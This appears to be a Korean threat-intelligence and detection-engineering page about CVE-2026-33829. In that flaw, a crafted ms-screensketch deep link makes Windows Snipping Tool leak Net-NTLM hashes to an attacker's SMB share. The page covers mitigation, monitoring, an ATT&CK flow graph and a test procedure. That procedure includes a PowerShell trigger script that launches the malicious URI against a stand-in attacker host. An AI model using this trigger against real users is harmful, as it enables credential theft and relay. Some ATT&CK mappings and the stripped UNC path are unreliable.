팔로우 
요약
Windows 캡처 도구의 취약점은 현재 로그인된 사용자의 Net-NTLM 해시를 원격 공격자에게 노출할 수 있습니다. 이 문제는 악성 심층 링크가 ms-screensketch URI 스키마를 악용하여 공격자가 제어하는 SMB 공유에 호스팅된 파일을 캡처 도구가 열게 함으로써 유발됩니다. 피해자가 조작된 링크를 클릭하거나 열어야 하지만, 자격 증명 유출은 Windows가 SMB 연결을 시작할 때 배경에서 조용히 발생합니다. 이 동작은 공격자가 사용자에게 눈에 띄는 경고 없이 NTLM 챌린지-응답 데이터를 액세스할 수 있게 합니다.
조사
연구자들은 ms-screensketch 프로토콜이 filePath 매개변수를 수용하고 임의의 UNC 경로를 적절히 제한하지 않는다는 것을 발견했습니다. 캡처 도구가 이러한 경로에 접근하려 할 때, Windows는 자동으로 원격 SMB 서버에 인증을 시도하며, 이 과정에서 NTLM 응답이 노출됩니다. 문제를 검증하기 위해, 연구자들은 SMB 리스너를 실행하고 유출된 해시를 캡처할 수 있는 악성 URI를 생성하는 개념 증명 스크립트를 만들었습니다.
완화 조치
Microsoft는 2026년 4월 14일에 이 문제를 해결하기 위해 캡처 도구에서 취약한 심층 링크 동작을 제거하는 보안 업데이트를 발표했습니다. 이 패치를 적용하면 애플리케이션이 신뢰할 수 없는 URI를 통해 공격자가 제공한 SMB 경로를 자동으로 열지 않게 됩니다. 조직들은 노출을 제거하기 위해 관련 Windows 시스템에 업데이트 배포를 우선적으로 진행해야 합니다.
대응
방어자는 ms-screensketch URI 스키마 호출 시도를 모니터링하고 비정상적인 내부 또는 외부 호스트로의 SMB 연결을 감시해야 합니다. 캡처 도구가 필요하지 않은 시스템에서는 가능한 경우 프로토콜을 제한하고, 패치 배포가 지체 없이 강제되어야 합니다. 유출된 NTLM 해시는 리플레이, 릴레이 또는 다른 후속 악용의 징후를 신속히 조사해야 합니다.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[“<b>동작</b> – <b>T1204.001 사용자 실행: 악성 링크</b><br/>사용자가 악성 링크를 클릭하여 실행이 트리거됨.”] class action_user_click action tool_snipping[“<b>도구</b> – <b>이름</b>: Snipping Tool (ms-screensketch URI)<br/><b>기술</b>: T1204 사용자 실행<br/><b>설명</b>: ms-screensketch URI 핸들러를 통해 실행됨.”] class tool_snipping tool tech_smb_conn[“<b>기술</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool이 filePath를 처리하고 공격자 제어 서버로 SMB 연결을 시작하여 해시 캡처를 가능하게 함.”] class tech_smb_conn technique tech_hash_capture[“<b>기술</b> – <b>자격 증명 접근</b><br/>공격자가 SMB 인증 교환에서 Net-NTLM 해시를 캡처함.”] class tech_hash_capture technique tech_lateral[“<b>기술</b> – <b>T1550.002 Pass the Hash</b><br/>캡처된 해시는 측면 이동 또는 권한 상승에 재사용될 수 있음.”] class tech_lateral technique tech_c2_web[“<b>기술</b> – <b>T1071.001 애플리케이션 계층 프로토콜: 웹 프로토콜</b><br/>공격자는 C2 통신을 위해 HTTP/S 프로토콜을 사용할 수 있음.”] class tech_c2_web technique tech_persistence[“<b>기술</b> – <b>T1574.006 실행 흐름 하이재킹: 동적 링커 하이재킹</b><br/>Snipping Tool 프로세스의 동적 링커 하이재킹을 통한 지속성 가능성.”] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
공격 흐름
시뮬레이션 실행
필수 조건: 텔레메트리 및 기준선 준비 점검이 통과해야 합니다.
이론적 배경: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적수 기술(TTP)의 정확한 실행을 상세하게 설명합니다. 명령 및 서사는 식별된 TTP에 대해 직접적으로 반영되어야 하며, 탐지 논리에 의해 기대되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다.
-
공격 서사 및 명령:
공격자는 피해자 워크스테이션에 발판을 마련했고 의심을 사지 않고 NTLM 해시를 수확하려 합니다. CVE-2026-33829를 활용하여 공격자는 악성
ms‑screensketch:URI를 제작하여 공격자가 제어하는 SMB 공유 (attacker.labsharepayload.png)로 연결합니다. 캡처 도구가 이 URI를 처리하면, Windows는 원격 서버로의 SMB 연결을 자동으로 시작하며, 기기의 NTLM 응답을 유출합니다. 공격자는 PowerShell을 통해 URI를 실행하여 사용자의 컨텍스트에서 캡처 도구가 호출되도록 합니다. -
회귀 테스트 스크립트:
# NTLM 유출 - 트리거 스크립트 # UNC 경로를 제어하는 리스너로 조정합니다. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "악성 URI로 캡처 도구를 호출 중..." Start-Process $uri # SMB 핸드셰이크 완료를 기다립니다. Start-Sleep -Seconds 5 Write-Host "호출 완료. '$attackerServer'을(를) 포함하는 DestinationHostname으로 EventID 3을 SIEM에서 확인하세요." -
정리 명령:
# 잔류한 캡처 도구 프로세스 제거 (아직 실행 중인 경우) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # 선택 사항: 공격자 측에서 생성된 임시 파일 삭제 (있는 경우) # (공유에 쓰기 액세스 권한이 있다고 가정) # Remove-Item -Path "$attackerServer$sharePath" -Force